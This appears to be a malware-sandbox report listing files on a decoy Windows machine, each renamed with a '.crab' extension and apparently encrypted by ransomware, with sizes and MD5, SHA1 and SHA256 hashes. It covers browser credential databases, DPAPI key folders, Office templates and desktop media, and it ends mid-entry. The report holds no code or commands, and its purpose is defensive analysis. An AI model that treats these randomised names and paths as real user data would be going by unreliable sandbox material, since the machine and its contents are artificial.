c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.57 KB MD5: 119c2713d08bfcfb9ccd760b83415d1d
SHA1: 8202232e6be763fa2c9717cd8f83a7eb20755bd5
SHA256: 400d0c5f32836eed6d4000f5c0a5452a07f9ad9c8b9c8f9c0548955bfdaa8879
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\14\built-in building blocks.dotx.crab 3.99 MB MD5: 571a4984c3e07a66aebc7115485223ea
SHA1: 4677ced183a7d20f88e5e4f15563e2b2a1964135
SHA256: bddc16e393a250a91ff7137a8988a0b91438256f0d14fe309c38071d9a3f84b4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\index.dat.crab 32.51 KB MD5: 1816966a801f6ecc148b139be7a84647
SHA1: 41e1ac0edb8182b78e2606ef24f8616694b79f35
SHA256: 7f512a9b311a10358d7ee9838198d1709a4f6eb11310edad6ddfd2223dc7301a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\1033\global.mpt.crab 382.01 KB MD5: db400a92034301e26fb298270a7b1b8c
SHA1: 212f765a52206e4191665e58e953ecd62a530465
SHA256: e589e5103cac86a67529e7062d41cc21cf00d4ac01b4ab04932bd815e606b456
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\mso1033.acl.crab 37.40 KB MD5: de188f543b4a5a17577bd75078059f57
SHA1: 0ed7ca405c02aa91b27e48e7f056129c083f01a0
SHA256: 66c9d5303261003219f000fefcfa62c0c60b955c724907cbe183f84f2f35e8ed
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.91 KB MD5: 4fb30ea2ebd8d9678f76d0c3196383c1
SHA1: 7c78d6ba79249d571a82874d4163a36e888d7c45
SHA256: 5e5e70bd882249cdb36b2702f85580e7e66e5dc39d96eb8d3cac36b08ef4dd59
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\index.dat.crab 0.57 KB MD5: 386bf6407369b11a634dff2ffc267d81
SHA1: c60ebddce1932b9369bb5112a230375001f9ddce
SHA256: c4be5dc004d466f64b79940a03f8fef2434917efde21820a28e96cc6e9e522a2
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.63 KB MD5: 13daff2f8605c16ca1caeb7aa376a76f
SHA1: 8b763a39a01c9c6d46bec84bdf55f8786880d17f
SHA256: dbacb4fd4bcd69bfc1b9498c7f3b8aea274b4eee885e49dac69ac8fd2ae52074
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: 3acad2022fa4f8ba24b9b568dfdd5387
SHA1: 136b4930bb7fde04af957263322a8b0536230cad
SHA256: df629c4e924b1f01dc32cf0287602862efa7613ef03d8510ba95e3cb3df9f15a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.93 KB MD5: 7b2be5882a2628c0a97c377b2923c9c1
SHA1: da912685abccf21e0db7e08058360ad91c52db71
SHA256: ce9d658336243a27b949ec282f51de76487661606ef0559dd0a01cf5da0b498f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\credhist.crab 0.68 KB MD5: b7fde0651d3844b9ab457cf523e8a691
SHA1: 0ca2eb523d259f512fe01357c02298453202c55c
SHA256: 44732bc5dfe28cc180bc58b8fe50e096434ec6e7bf8cbe53a88fa429aca998ad
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.crab 0.98 KB MD5: 74544e3c959fdab6e58ce89b181f4d0a
SHA1: 57ffb4092f096d7aea997b62481ad0a58527acf2
SHA256: 8ea60dac8ee5d06facd4c11f7c8fe7010c6422291bd350dd178052a4d8387be5
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\preferred.crab 0.54 KB MD5: dda59e69877a0faabb5432e4c28b1c71
SHA1: a897f86845ed8d9c993255780910356b99a1653d
SHA256: 3ed8861071498fb27c42a0c7c0e1ca23078243016cee8b7ca57eced5c342ddf4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\02540a10-7eb7-4b20-a8c7-470f8986389c.crab 0.98 KB MD5: 071941c061b92aaa31b98c010e195a76
SHA1: 462a9b974ad1dc5f6fa1c771fc4f0eb4f657a381
SHA256: 42291d8872e8e9d9c8e7db053b1a3aaa7a9c06e4d8a355f46868eea76ec6d3e7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\2be989a0-16a1-424b-9211-51aa3bb43e5d.crab 0.98 KB MD5: ba90c374404a7c68aaf5c4c483eab5ab
SHA1: 7ec17a81c3f79f1e823543d4e928bc2758c8575d
SHA256: ea355c0c82bb0581026bd4624d73682c51156019826e92296fe9ec9f5b033ea5
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\fbbe72db-afd8-443b-88dd-64b20388700d.crab 0.98 KB MD5: 86863d9cde693c5a232c9e1d47c0c04e
SHA1: 8267d503cc858ff53351b5f7464dc6bba69ba955
SHA256: 00ea3d66e5a4ab51a8bbf429c090128820ebd4a6c95b6fdef22d65ae27facf95
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\preferred.crab 0.54 KB MD5: bfdfaa536500236d4200738a5cc73f0e
SHA1: 135e39a43e90cccbbbc03fe90ca00ea52c0b6b7f
SHA256: 74a7a88e04fcba0d5ddb562a2e747e49b7f08981d9d773f803ab6e1b33c067f7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 92097b814ca75c05674d8e0f0aeeba68
SHA1: b60856bc5d2963653319f475c71ef84242a07d2f
SHA256: f88d77af5a4dba4a30da152b30384aefdb93bec6d61c76872755716392bf2fc0
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: 28e6f04dc5f617e3f6c6cc189c1a8c15
SHA1: 6abc23dc2839bbb1c9b9a14360aeb75ed74c07db
SHA256: 625d1ab185504d31ecdfe4e549e807e58673b869b731330de23050fa63fb94b6
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\templates\normal.dotm.crab 20.66 KB MD5: 5bf06ec43d1aad3465f8fb536ad30543
SHA1: 24474184317a4dc61eef71606d54dede6cdb2c83
SHA256: 8aa5841fa7e2394b1828eb3b0294b152739d4844592b26245e4fc65796655b2a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332.crab 0.52 KB MD5: 99433fa9c4a1aad892b0cefc71f5450e
SHA1: 5b118a31d845d2421c782acd1a4b0350744bd171
SHA256: 4a6b18ca9720b0560196e0453a7333e0623a03b5975797d4e92ca33d389632e4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\addons.json.crab 0.54 KB MD5: fb62dfa28926fd30ad72165158acfd95
SHA1: 1ff8102ef5047af27f88d95283edaefc16bbe85f
SHA256: 69ef64128fc1d08143351f64383aad4fd6ab1201321e378168b78d0de0a2ac8c
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-05_5.json.crab 3.48 KB MD5: d8aeb1a07a887f6b47092d32337416e8
SHA1: 00a7045b7566b5b1bebbf5ae0baceec7b6314e33
SHA256: f7fd45f7ade08d175056d07bbde2c31207030a46b50b463a88d22909332e373b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-16_5.json.crab 3.48 KB MD5: b61d9b36c0a9b6e0948b39141ccda615
SHA1: 99827d886f446cd14a93b5bdd788e0cb299a2fb5
SHA256: b74e93d88302c3e5a05e65e35a87bccf0bf50f69178b8519f6961e671153a197
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cert8.db.crab 64.51 KB MD5: 7712c2a14ab685d96caa1eb6db8aa3c5
SHA1: 269fd26241e22634deacdb36d69d7e33ba48bde2
SHA256: 1be3036edcabd214fd09ec822c6eac50ab9e108073ffcadcc3cbb05344ca1631
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\compatibility.ini.crab 0.71 KB MD5: 861bdd9a76c8f13ecc1a216f8404626e
SHA1: c5310e6f643862353bded450e971354eab2c928f
SHA256: 75226ec0c4e30028ca419b5459dea3c6dd5d6da778129a8af0464d5912b9777b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\content-prefs.sqlite.crab 224.51 KB MD5: 65637edcd13e99bef2554ab9e6b7c393
SHA1: 27449039f97143133cc320b6227b7d2b346a0f1f
SHA256: ffd7efbc4b0f22e061e02790aa933dd836dccaf429126c0299b408481c541d6d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cookies.sqlite.crab 512.51 KB MD5: b52e55ff3a3fb915dd00a12929f54e22
SHA1: 6cf3414c7f8dc112086b2708baa111ec5f6243db
SHA256: 62440e7e908956c885841ee713e3a0acaa19450f249dd8047f0be9d5556fc1db
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\downloads.sqlite.crab 96.51 KB MD5: 06a66080d956aad9b91dedf5f26ec008
SHA1: 7c160ee3ead545de051b2d4a8af8ddb59f2bfed6
SHA256: 8bfb739ac3357f27f488ad965cdf9d318e8458986ccf4c0f123aea045ff9f427
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.ini.crab 0.65 KB MD5: 4d05aa9636773f03948869fcddc2255b
SHA1: 4f2d25afe23e7b7d4e182d778ac197ec63bc69dc
SHA256: 82855eb9f94e12e2f93c7f9022a67e43b912c0ac1b94089ad39ef3f39355efdd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.sqlite.crab 448.51 KB MD5: 59bf4fbb869aabdf54d48886c41b0dc9
SHA1: 951ed2bd0800e6f2661354799fdda8e0d48621a2
SHA256: 9d83eafea1068d344c1e5b10978e54652a46e8f30a50f9217481e3b959bd32b7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 640.51 KB MD5: 3f8b1d1a21090c706902cd602c184760
SHA1: 723d30a90234d7a8717f6e3612d40d0c8bb2e0bf
SHA256: 11409711c35892dbbab18a83dd7b239c084115465196e9e6e50439e3e9c17f8a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\key3.db.crab 16.51 KB MD5: a0b3e7b7c6ef6139f22c1345cf3db69f
SHA1: 6e2083ff5bc3be606fe6b8242d7bf2d5137eac04
SHA256: 70df366d24fac19d3ac1cc600b21d9d4156b186a36286b4553ad844ef5e0c240
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\localstore.rdf.crab 1.77 KB MD5: ea2304ed8945f089fc1ab4a1786d2d2a
SHA1: 9ba35a7e85b81ee0f348da5c8701f1e57102c051
SHA256: ca480f9c56e1ed2067368399513e6d030bb30d02c032c64d01e6b879f024914f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\marionette.log.crab 0.57 KB MD5: dabfab4250c0d6cedcba1560115b7116
SHA1: f85bb63aaabbe4eb3ab4a482be2e614ee4700051
SHA256: 2adc5303de8d58f667d053680bde70d6a732191f9ea20ca0c9fe21bd28c44c3a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\mimetypes.rdf.crab 4.26 KB MD5: c55acd8efd80f08e4e71574ed60ee708
SHA1: 4750d66b53f401e820cb9a543c8bd5511e63bc89
SHA256: 61541404be78add186adac79091252d62adb8b9d5bf52861d1fc245ec4ae177d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\permissions.sqlite.crab 64.51 KB MD5: e1039206bd646883ec90ad9e7b8f729d
SHA1: bea71e8f70f116840dea014bc6e9645d81d49c50
SHA256: ac4458e7f13f220db00a63e29f33444d64227db217dc1d1b63935edb32746459
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\places.sqlite.crab 10.00 MB MD5: 8ec43043ec817f0154e727589d5535ed
SHA1: 35148c5cc59b978203012a7fd4dae6f28ebe531f
SHA256: 7482d83790814733b672593fa11af63423dfdfcdda0a1d2c9c1c3ca7c49f17ac
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\pluginreg.dat.crab 4.04 KB MD5: 4de74b188b633d354a479315e2be6dae
SHA1: 25d5325adff5e52748ed5549240c5591edc661aa
SHA256: 90c8fc483f2b6a814adc9dc268149736b955d2165a53fade6a1facc41b1a0457
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\prefs.js.crab 4.48 KB MD5: 18345bce62591199695d28dab8c9f4d4
SHA1: dfe71c66bdd159c96f4a37a0f0de332507ef5092
SHA256: 8e234fc21e3edc39816b33db29432dbd6de5a5bf99f3087860c7fa9d1eb0c5ae
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\search.json.crab 16.90 KB MD5: e8268002d1eaed6e7f27b1a898d35927
SHA1: 7b1f3281ea5721632a7d6506ccbbee0be1f6566b
SHA256: 852bd2bb5c35f0937b27521cfb4b97f710cf61939876a4b62950351cfffb585b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\secmod.db.crab 16.51 KB MD5: dcd362083d46cfb4aec57398908964b3
SHA1: a3f125a27680342ee6b59f48118a4bfb98f5bdbb
SHA256: 5e4d02d70438462f6e46bb8d72cd6c0a4fc5d39b63b3b5d0123618763e44f46f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.bak.crab 1.48 KB MD5: 8fd7068f701878c4273dbb56c5af0f1e
SHA1: b1b963ff43f4fe82049847ec58242e95969c450f
SHA256: be79cf8c9553771f03fea72cd871de9b0048ee80e394e882925406dfcf67b13b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.js.crab 3.46 KB MD5: f0cb38e0f33bde285e847f1daaceeba0
SHA1: 2fd434db765de3cd571644f5ec216a33cc26d266
SHA256: 86c0ab06b8470f742396b1ac71ac10aa53b7d8ba67e19705a0e707da6735c2e1
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\signons.sqlite.crab 320.51 KB MD5: b9d320a0581118ad86efcfd7899b86a2
SHA1: 1eb6f36e1d378bae01d862d01a309b9371912555
SHA256: f8dda87aa5a52828b2a0c6ee13fbe5fa9a8f436b08927ac708c1f5cef9cd2f9e
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\times.json.crab 0.54 KB MD5: 4afadc75e99869bf1a99404032cfcc27
SHA1: 402a0bec87f52f841ce5a49b483f5acdafa9b245
SHA256: 06b0632c5be0eb35cc8671ff8dd5b1cb355b56fe086c93f52be4133226af05b9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\webappsstore.sqlite.crab 96.51 KB MD5: 492af8cf1b95f62f23e545da9805c3b2
SHA1: 9ffe6c779f9e85775a51141efb26c912672c19fd
SHA256: f0c6163c32855b20a9a90f492aba6542079e01fdf8f067a3780b753c5e3e4e29
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles.ini.crab 0.62 KB MD5: 6606b4783fe7ff0aeaf490eae530e772
SHA1: dc82f9fef2c4c46a8cc1b44e2a93fd27e778ffe8
SHA256: 37c249cb625cbc539f33a45c1fe0589ab475da6f43cced55ab92ee65e5e208ff
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mpwe.ots.crab 38.05 KB MD5: 7d83996a033607396d1cecd6051871e8
SHA1: 16c87befde4af84d9dde256429f312ae1d2c97e0
SHA256: 6190188e3053a1f8347370494be7fd2007e8cb5452c16c30bb81d519efd895e3
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\n0j-h4axm1a_.mp3.crab 37.23 KB MD5: 58cbae4253a1a2d3b7f2a96ca3f523eb
SHA1: d2d32a3f18fcb8bcf1a4f5a247a31d79a5a5796d
SHA256: bdf12fafe256114700107c2d0534e56213ca780cb0f136f0d5b3af015c9b3e8d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\njhqk.mp3.crab 58.34 KB MD5: 15925403f169a2db0928b4abaed46827
SHA1: 94557c29264b38565e6636c8a7512e70a6ceaee0
SHA256: 5b719ffeb81c92394aa6ba0034d84c7ec623d3644fa366a19d6861db9b861b51
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\no6oei56s1gzlyz.bmp.crab 59.98 KB MD5: d2f8559fbabb7966e3a26a07c4c840f3
SHA1: dd28e1d223781f29f1641915cba3143557db7a71
SHA256: 72742350db52488a65728fe773fd615dd307b9d1e13f23f80841651558cf4efc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\odwlklz4.wav.crab 40.15 KB MD5: 8f8dfe2dd24ba9e5a0de285cf018f0f1
SHA1: feb4ae7c1da76f6cee32c62a162d2ef1336828fe
SHA256: eb29f564523b51cbb29c831a12e5bab3f7abd340b59bb2e4bf041668934b1501
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ovsyo7pqdjezj.jpg.crab 16.29 KB MD5: 2bc609737fe424d45dfca7c92896e1d2
SHA1: 1e14409fcfb2499df72ef96bbd85fc10a6ddb158
SHA256: 1513413aa2fbdaa5d0e3977d0a106fc4c1835545a115982ca7e31700e30055f9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\pkbvbzek-3 dc.m4a.crab 8.20 KB MD5: 14ec30daf5d70923008a53592460c7a1
SHA1: 2588dd21ce188ddbd8b3bdf65fcf4c0442df9b61
SHA256: c72f432c275515a210723e3f49d25c1f6af19ec22f190aafc60510bdd18d391a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\tyxijnscjure.jpg.crab 94.63 KB MD5: cfdf074dcc6be1b39fdb55ebc179bc7c
SHA1: 9451714a2f4c9a10d622e5597f7c963bcc20c6e1
SHA256: 5c9e4cc49b3b93becd098bfd714dee8c2a5ccffab48f878f13b3bfdc6f70edfc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\u-1xhgu-qj0 3jya.m4a.crab 18.18 KB MD5: 709bd269ef5755170908875a3ad947bb
SHA1: 51417b096985cb68ae6dac04a7506e181756ca66
SHA256: 6b6b00599b13e6b2881914db1802763b9e291306263ad9c48a23e98df6f75e45
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\zfdt.mp4.crab 8.34 KB MD5: 07ccc47c4945f83f3d8078f08af5b43e
SHA1: 032db88a5248eb1885d3181391ba17a316ad5847
SHA256: f86063c23ee155cf2263909beccad93491c851e2652f78c4b69f432047be6099
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\zs0mljmwh2pip6.swf.crab 14.96 KB MD5: 872bfa68ba37cb87d8f8ef7aca313b27
SHA1: 183eef3baa951144e9406eb8352870a5b003d1a9
SHA256: ecf1040976f88505fe1b4acd3bef634c4609e40928c6d2ca8ff6d04664e84e57
False
c:\users\5p5nrgjn0js halpmcxz\contacts\aclviho asldjfl.contact.crab 1.66 KB MD5: 0cb4fe7c992b4b9c401ca3ea5d890615
SHA1: 6cb11d20c82f41d5c2421c77e6892834253223ef
SHA256: ea58ecdbd747284b20e1351ef45c4a4b74afb21d3e8631ac11a95e4861c5fabe
False
c:\users\5p5nrgjn0js halpmcxz\contacts\administrator.contact.crab 67.29 KB MD5: ad237402b590d3583636d360d207246c
SHA1: 5d056c3c8530663486d2b10b0c25e2a350cbbc61
SHA256: f6f530765525eda080a6e3228f3ef59b509f585f64df7123e244696be156f673
False
c:\users\5p5nrgjn0js halpmcxz\contacts\asdlfk poopvy.contact.crab 1.66 KB MD5: 21254075c1954d19ffb5f3683a70e936
SHA1: a2047f9bd9af72e17a6f018350132a3f97bb1be6
SHA256: 33fb6ce21abc1322add42d57f11939f4b57bbc5fd4c651b3c28f33fd072b09b3
False
c:\users\5p5nrgjn0js halpmcxz\contacts\chucu jadnvk.contact.crab 1.66 KB MD5: 51c6ff51c9f54723109b27cc29bda2bf
SHA1: 71e451384cd531e5bb6386b6be11ee3020864b79
SHA256: 349a1a4bbb6ebe667345139e28bb0f1db20f18e5cdc1ac79b53dbefa83ef46af
False
c:\users\5p5nrgjn0js halpmcxz\contacts\lulcit amkdfe.contact.crab 1.66 KB MD5: b890266c6a013061b1889ff82c5a6e25
SHA1: 5b2cbdf828a23c877905a25bd20cfbc06c66617c
SHA256: 3cebed8d9c882aafcf2e68ee6c6189fc4a81696688fd81779189f9c00ce74a9c
False
c:\users\5p5nrgjn0js halpmcxz\contacts\sikvnb huvuib.contact.crab 1.66 KB MD5: 0ba26de87cfb5b3e0fda8b1e3d8d2d63
SHA1: 2da939eefef65e14643b1723e702516d739f3bf3
SHA256: 51426f52cdf26bfe857df9d1d04b3130c0150e2989f638365b7fc03a9c4ae356
False
c:\users\5p5nrgjn0js halpmcxz\desktop\10robsv5r-dxmczvr.mp3.crab 32.12 KB MD5: b6be6629523d67774627b98b1fbbfefc
SHA1: 2f4c92d0d4e8c97854d6c0923cfc32d92c2a1fe7
SHA256: 0c645e787ed1638a99bacd020b1ce04fe62a90c4e6ba294e04bcb8b8dad5dd46
False
c:\users\5p5nrgjn0js halpmcxz\desktop\2v-lprvtp1.wav.crab 8.76 KB MD5: 74b2843d54c8d3231166354222f9c3fd
SHA1: 0f97f0874812bec72d3496b30e228d3cb116720d
SHA256: f9eb933027b7f8c56ecc7d128a98094e222c843f553a729e3c8b05feaff008a2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\3fcdlh6fv9ovg5vm.swf.crab 77.21 KB MD5: f3aff3c67f54ea049cfb4c0faa879b74
SHA1: 6c40b25b96b8bc13852874454be05ce285818164
SHA256: ddbafabe2f58860182ee1b872f381be072dd5d7d805c4b71ab6e240ea947e0e2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\3rthlrdc2k0.swf.crab 36.88 KB MD5: dace0fd3563ea35b3d38ff1bbefc20d4
SHA1: e7ac63b094fe01f6bab239afd7659eccc1e55c79
SHA256: 4e627dbd40859c58ca6fb315ea58494713b8f515dac61c4f25d0b97d0b17ff96
False
c:\users\5p5nrgjn0js halpmcxz\desktop\4evdmq0pggz3r8xadm.mp4.crab 27.07 KB MD5: e374ecd1ac31d5b53c8316fd5716b0f5
SHA1: f41b3bc1f408a0e2135c9a6bcedcd56c0f558077
SHA256: a7803fe6338896203136b80f74a3d32266bc0e3a31bb85cee3ab4c4311e3a526
False
c:\users\5p5nrgjn0js halpmcxz\desktop\8dtew.wav.crab 41.45 KB MD5: 9020b626d839d05027c6f0ab9b1f7b9c
SHA1: 65f553026c4a08a7136b45972344e2d15b97f289
SHA256: 7c964ce84ed39efba6dbef4f9f2102e22cee767b97c3efc934e9db980b36a9fa
False
c:\users\5p5nrgjn0js halpmcxz\desktop\bpqeh.m4a.crab 99.71 KB MD5: 20b73002836a6044a512ce43315d495c
SHA1: 8b679c98ddee23f55ae974d0b43515ec5248640d
SHA256: f0d4112153a7de9756cc78e86fe205631f0234452831e85dcf6e2a0fc37ae238
False
c:\users\5p5nrgjn0js halpmcxz\desktop\btlmnelb6h3yyqxdqual.mp4.crab 29.85 KB MD5: 5782dc232a056c0bf29d6832af5e4163
SHA1: 48107d5caad68b7ee9deb6858c3a5dfbf980364a
SHA256: 81df32c108f9b0a17a7d8d2d739871e821f6fed71f89020414cfc2fd1c33a8a2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\csotfjimh a2.swf.crab 36.29 KB MD5: 026248b616c081283a4bf3889518982a
SHA1: 05e95595541ddfbed489db1fa2d50c7e3700070f
SHA256: 1a19acfee47cc96b487b046c3c2c50e452295cfde7ba7feb726e8ebf2fd9dfd8
False
c:\users\5p5nrgjn0js halpmcxz\desktop\cwnfgb.mp4.crab 62.09 KB MD5: fe919362801ab9ba98d8707ae1a18c06
SHA1: dddbc4e7c1178025297ed732b23db60c1bbab650
SHA256: a22249ab1c688dc6f955c6afd26a2e4acae355ababa5322778c3cd379f07ad3e
False
c:\users\5p5nrgjn0js halpmcxz\desktop\excfcss22h5icieztq36.avi.crab 69.30 KB MD5: a25c137303afe3dc5ae9899432fb59e0
SHA1: bc8716a70261f8bbd34dde038f41bde7ded57552
SHA256: 047696fdd4b41663603107b993c4b2a3addd16b26767b97f7aba745da0978aa2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\gbhj8yig4wryyemy.avi.crab 14.90 KB MD5: 11881ef3e3232d5caa3a1be65915dd59
SHA1: 12bf61fabc4d687732998a58435c91e2b6c7f41a
SHA256: d27c866272d2b3f0f442e087412a72428e4beb23007ce6eee470106c613fac58
False
c:\users\5p5nrgjn0js halpmcxz\desktop\gbrght1ccujgy.swf.crab 69.99 KB MD5: 1f0096d2fa12e1099a184a6811a26cda
SHA1: c1aede9213cea322276f1907ac58bbfe5003ab61
SHA256: 6535e178ac727afbf1129dee590c05d2cd6554d71f908b8d261f99c9ce85d594
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hfvdupoqg6.bmp.crab 58.02 KB MD5: a5302f53297b4d5b4e20b630760bc682
SHA1: a2001affa2138d8ac6e9b8398ce2e30d9bdf1749
SHA256: 6cc290fb4205447a8ee7e552380034542fb5535b5b5ad5cda84d149227be66eb
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hkikm9bcjrllh8wkm.docx.crab 7.54 KB MD5: 0fe248014f8ea49c2ed4c07c7d1637a0
SHA1: ac3bf7275eba6385a51c1c1ab263e24c9a8ddac7
SHA256: bc7c04b104908be2a230b20d937547ad466f6ade076531fadc1a407a8060afe8
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hy4vakoceqcuwqodf0f-.mkv.crab 58.66 KB MD5: 4e0e46d30fd1d58a3d04f50ec82fc576
SHA1: 8496279b647e90139f9104c2e95abc255e5df059
SHA256: 70273888cfb2b6de6aaae59f41831d313833f322a2aa0f4db76fd92fbbcae309
False
c:\users\5p5nrgjn0js halpmcxz\desktop\j-_vbyhxqcag.gif.crab 53.09 KB MD5: 38225ccc6ad4691832e508b2e90c7864
SHA1: ac6a03871ff7b592af86416622c76bd8b62b8d2f
SHA256: fab3cea086589f589503dba3df044bd335dcc967612c915d32cfb86d9facfac0
False
c:\users\5p5nrgjn0js halpmcxz\desktop\je-s6fqve k1ih 9.swf.crab 3.01 KB MD5: cad63b973e621016fc91bfc2f60a56a0
SHA1: dd259963ab68410a5876aaed6cedc139c150a602
SHA256: 542be7a78b82202f0f63a66b7c5721ebb98aeca7e086917f1ef8ad6638fca445
False
c:\users\5p5nrgjn0js halpmcxz\desktop\k64qw9_noz4xafx.xls.crab 18.66 KB MD5: ade4c447fc46dc1ed70bf25d14587323
SHA1: 79304d6325615ce6f6bb9a11ad8adc4e0f355dc1
SHA256: 06a3912e348c9ecefd19c715d1fd2d83a35c7938c340b7b8bbe11fb832713fc6
False
c:\users\5p5nrgjn0js halpmcxz\desktop\mvu8qqmt0h.bmp.crab 10.40 KB MD5: 95d04bb0ff7dd74c609563e38ec48a0e
SHA1: ab94daef2dbad92e91415dd287692e935ddac2cc
SHA256: ab6299611fade2bc417ef303a461073fac424624d0854c3a4cd7e0a3c6f19929
False
c:\users\5p5nrgjn0js halpmcxz\desktop\nhjyefk5yv k1 pz.mp3.crab 47.18 KB MD5: 19bada29ecacd59a01bd88348a7aa091
SHA1: e746c9eee160b44b92e984247779c676c436595a
SHA256: 67879e5180c35c79e86cc898cb3e2d079e659c0aec5866e8c8d259e9f0c95bf1
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o0yjld4mxbtwf.avi.crab 5.01 KB MD5: 6fb6d5536bc7839727f41ea2e51e2a49
SHA1: 625cb334ab2b03bae51ad9be3ceb9486bc99f6e1
SHA256: 56c3aa5a010447f59fa25500da755046a384a7ade0731bd97cca99787017c5ed
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o5xicnqyl_ru.gif.crab 81.71 KB MD5: d198649ab2a505fd09a244356cf53354
SHA1: ae6da9b7b96d007158c90d0f7a759c4c864c5357
